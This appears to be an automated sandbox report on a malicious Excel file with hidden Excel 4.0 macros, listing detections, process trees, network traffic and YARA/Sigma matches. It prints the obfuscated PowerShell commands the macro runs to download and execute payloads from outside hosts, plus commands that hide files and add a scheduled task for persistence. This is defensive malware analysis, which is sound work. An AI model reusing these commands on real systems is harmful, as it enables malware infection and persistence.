Loading ...

Play interactive tourEdit tour

Analysis Report spetsifikatsiya.xls

Overview

General Information

Sample Name:spetsifikatsiya.xls
Analysis ID:336052
MD5:bf9774e5063791aba95abb5b808aea43
SHA1:2774db354121fd9080d86623e8e854af967b14cf
SHA256:bcac1e33956458b61bbc185ad3861e385f863ec9bb9232e67eea95282929ce30
Tags:SilentBuilderxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM_3
Contains functionality to hide a thread from the debugger
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Hides threads from debuggers
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Obfuscated Powershell
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sleep loop found (likely to delay execution)
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 944 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2504 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2364 cmdline: powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2524 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2704 cmdline: powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2316 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2852 cmdline: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • attrib.exe (PID: 3036 cmdline: 'C:\Windows\system32\attrib.exe' +s +h pd.bat MD5: C65C20C89A255517F11DD18B056CADB5)
    • cmd.exe (PID: 1616 cmdline: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2480 cmdline: powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • cmd.exe (PID: 2164 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat'' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • mode.com (PID: 1944 cmdline: mode 18,1 MD5: 718E86CB060170430D4EF70EE39F93D4)
          • cmd.exe (PID: 2320 cmdline: C:\Windows\system32\cmd.exe /c ver MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
          • cmd.exe (PID: 2232 cmdline: Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • powershell.exe (PID: 1520 cmdline: powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe; MD5: 852D67A27E454BD389FA7F02A8CBE23F)
              • sb.exe (PID: 1464 cmdline: 'C:\Users\user\AppData\Roaming\sb.exe' MD5: 1C1BDD57483BBFBB497B4596BE12B053)
                • schtasks.exe (PID: 2436 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
                • sb.exe (PID: 1192 cmdline: {path} MD5: 1C1BDD57483BBFBB497B4596BE12B053)
    • cmd.exe (PID: 2772 cmdline: cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1468 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
spetsifikatsiya.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x393c2:$s1: Excel
  • 0x35aaf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x12607:$r1: p^owersh^el^l
  • 0x128a3:$r1: p^owersh^el^l
  • 0x12b83:$r1: p^owersh^el^l
  • 0x12dd3:$r1: p^owersh^el^l
  • 0x12607:$r2: p^owersh^el^l
  • 0x128a3:$r2: p^owersh^el^l
  • 0x12b83:$r2: p^owersh^el^l
  • 0x12dd3:$r2: p^owersh^el^l
dump.pcapJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Documents\pd.batSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
    • 0xd4:$r1: p^owersh^el^l
    • 0x370:$r1: p^owersh^el^l
    • 0x60a:$r1: p^owersh^el^l
    • 0x85a:$r1: p^owersh^el^l
    • 0xd4:$r2: p^owersh^el^l
    • 0x370:$r2: p^owersh^el^l
    • 0x60a:$r2: p^owersh^el^l
    • 0x85a:$r2: p^owersh^el^l
    C:\Users\user\Documents\pd.batJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000018.00000002.2229844300.0000000002900000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
        00000011.00000002.2120343706.000000000389B000.00000004.00000001.sdmpSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
        • 0x1afda:$r1: p^owersh^el^l
        • 0x1b276:$r1: p^owersh^el^l
        • 0x1b510:$r1: p^owersh^el^l
        • 0x1b760:$r1: p^owersh^el^l
        • 0x1d674:$r1: p^owersh^el^l
        • 0x1d910:$r1: p^owersh^el^l
        • 0x1dbaa:$r1: p^owersh^el^l
        • 0x1ddfa:$r1: p^owersh^el^l
        • 0x1e0bc:$r1: p^owersh^el^l
        • 0x1e358:$r1: p^owersh^el^l
        • 0x1e5f2:$r1: p^owersh^el^l
        • 0x1e842:$r1: p^owersh^el^l
        • 0x1afda:$r2: p^owersh^el^l
        • 0x1b276:$r2: p^owersh^el^l
        • 0x1b510:$r2: p^owersh^el^l
        • 0x1b760:$r2: p^owersh^el^l
        • 0x1d674:$r2: p^owersh^el^l
        • 0x1d910:$r2: p^owersh^el^l
        • 0x1dbaa:$r2: p^owersh^el^l
        • 0x1ddfa:$r2: p^owersh^el^l
        • 0x1e0bc:$r2: p^owersh^el^l

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Scheduled temp file as task from temp locationShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\sb.exe' , ParentImage: C:\Users\user\AppData\Roaming\sb.exe, ParentProcessId: 1464, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\axoikBEWgDCn' /XML 'C:\Users\user\AppData\Local\Temp\tmp8C58.tmp', ProcessId: 2436
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 944, ProcessCommandLine: cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP', ProcessId: 2504
        Sigma detected: Hiding Files with Attrib.exeShow sources
        Source: Process startedAuthor: Sami Ruohonen: Data: Command: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, CommandLine|base64offset|contains: , Image: C:\Windows\System32\attrib.exe, NewProcessName: C:\Windows\System32\attrib.exe, OriginalFileName: C:\Windows\System32\attrib.exe, ParentCommandLine: powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2852, ProcessCommandLine: 'C:\Windows\system32\attrib.exe' +s +h pd.bat, ProcessId: 3036

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Roaming\axoikBEWgDCn.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Roaming\sb.exeJoe Sandbox ML: detected
        Source: sb.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_00426F7A GetFullPathNameW,FindFirstFileExW,GetLastError,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_005C7F30 FindFirstFileW,GetLastError,
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

        Software Vulnerabilities:

        barindex
        Document exploit detected (process start blacklist hit)Show sources
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe
        Source: global trafficDNS query: name: cutt.ly
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.22.0.232:443
        Source: global trafficTCP traffic: 192.168.2.22:49167 -> 104.22.0.232:443
        Source: global trafficTCP traffic: 192.168.2.22:49171 -> 185.157.162.81:1973
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 05 Jan 2021 09:06:47 GMTServer: Apache mod_bwlimited/1.4Upgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Tue, 05 Jan 2021 00:27:38 GMTETag: "74e447a-353000-5b81c46187603"Accept-Ranges: bytesContent-Length: 3485696Keep-Alive: timeout=5Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 b1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 1a 35 00 00 14 00 00 00 00 00 00 b2 38 35 00 00 20 00 00 00 40 35 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 35 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 38 35 00 4f 00 00 00 00 40 35 00 84 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 35 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 18 35 00 00 20 00 00 00 1a 35 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 11 00 00 00 40 35 00 00 12 00 00 00 1c 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 35 00 00 02 00 00 00 2e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 38 35 00 00 00 00 00 48 00 00 00 02 00 05 00 20 5d 00 00 c0 43 00 00 03 00 00 00 65 00 00 06 e0 a0 00 00 80 97 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 04 00 00 06 00 2a 0a 00 2a 00 13 30 02 00 2b 00 00 00 01 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 16 00 00 0a 00 00 02 03 28 17 00 00 0a 00 2a 00 13 30 05 00 dd 07 00 00 02 00 00 11 00 d0 02 00 00 02 28 18 00 00 0a 73 19 00 00 0a 0a 02 73 1a 00 00 0a 7d 02 00 00 04 02 73 1b 00 00 0a 7d 04 00 00 04 02 73 1b 00 00 0a 7d 05 00 00 04 02 73 1b 00 00 0a 7d 06 00 00 04 02 73 1b 00 00 0a 7d 07 00 00 04 02 73 1c 00 00 0a 7d 08 00 00 04 02 73 1d 00 00 0a 7d 09 00 00 04 02 73 1e 00 00 0a 7d 03 00 00 04 02 7b 02 00 00 04 6f 1f 00 00 0a 00 02 7b 03 00 00 04 6f 20 00 00 0a 00 02 28 1f 00 00 0a 00 02 7b 02 00 00 04 18 6f 21 00 00 0a 00 02 7b 02 00 00 04 6f 22 00 00 0a 18 22 00 00 04 42 73 23 00 00 0a 6f 24 00 00 0a 26 02 7b 02 00 00 04 6f 22 00 00 0a 18 22 00 00 86 42 73 23 00 00
        Source: global trafficHTTP traffic detected: GET /bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe HTTP/1.1Host: speed-bg.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 185.157.162.81 185.157.162.81
        Source: Joe Sandbox ViewIP Address: 104.22.0.232 104.22.0.232
        Source: Joe Sandbox ViewASN Name: TELEPOINTBG TELEPOINTBG
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
        Source: unknownTCP traffic detected without corresponding DNS query: 37.46.150.139
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: unknownTCP traffic detected without corresponding DNS query: 185.157.162.81
        Source: global trafficHTTP traffic detected: GET /bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat HTTP/1.1Host: 37.46.150.139Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe HTTP/1.1Host: speed-bg.comConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: cutt.ly
        Source: powershell.exe, 00000007.00000002.2110085564.0000000002420000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2129560236.0000000002450000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2106880201.0000000002390000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2157964975.0000000002360000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: powershell.exe, 00000007.00000002.2110085564.0000000002420000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2129560236.0000000002450000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2106880201.0000000002390000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2157964975.0000000002360000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/
        Source: powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/cc
        Source: powershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2106136798.00000000000DE000.00000004.00000020.sdmp, powershell.exe, 00000010.00000002.2157320922.000000000032E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: powershell.exe, 0000000E.00000002.2106136798.00000000000DE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.c
        Source: powershell.exe, 00000010.00000002.2157320922.000000000032E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner7
        Source: powershell.exe, 00000007.00000002.2107902230.00000000000EE000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: powershell.exe, 0000000A.00000002.2128348191.000000000037E000.00000004.00000020.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
        Source: sb.exeString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
        Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
        Source: C:\Users\user\AppData\Roaming\sb.exeWindows user hook set: 0 mouse low level NULL

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: dump.pcap, type: PCAPMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
        Source: 00000011.00000002.2120343706.000000000389B000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
        Source: C:\Users\user\Documents\pd.bat, type: DROPPEDMatched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
        Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
        Source: Document image extraction number: 0Screenshot OCR: document is protected 1. Open the document in Ljivmjt' iS not available for protected documents.
        Source: Document image extraction number: 0Screenshot OCR: protected documents. 2. If this document was downloaded from your email, please click EnUk Editim
        Source: Document image extraction number: 1Screenshot OCR: document is protected 1. Qpen the document in Microsoft Offiu'. Prrvirwing onlinr is not availabk
        Found Excel 4.0 Macro with suspicious formulasShow sources
        Source: spetsifikatsiya.xlsInitial sample: EXEC
        Found obfuscated Excel 4.0 MacroShow sources
        Source: spetsifikatsiya.xlsInitial sample: High usage of CHAR() function: 21
        Powershell drops PE fileShow sources
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\sb.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\sb.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\user\AppData\Roaming\sb.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\sb.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\sb.exeMemory allocated: 76E20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\sb.exeMemory allocated: 76D20000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_00478772 __EH_prolog,GetModuleHandleA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_005C6B10: new,DeviceIoControl,
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00326C3C
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00321800
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00325108
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00325968
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00322E00
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00326414
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_0032F904
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00325958
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_003251C8
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_0032F29B
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00322B58
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_0032F740
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00322B47
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00328FB6
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_003217F8
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00340C5F
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_009B2AF7
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_009B2B1C
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_003204FC
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 24_2_00320500
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_006940D0
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_006849A0
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0040EA7D
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_004F2AA7
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0042ABC1
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_0068321E
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_00411532
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_004276C4
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: 27_2_00689D67
        Source: spetsifikatsiya.xlsOLE indicator, VBA macros: true
        Source: C:\Users\user\AppData\Roaming\sb.exeCode function: String function: 006876A0 appears 87 times
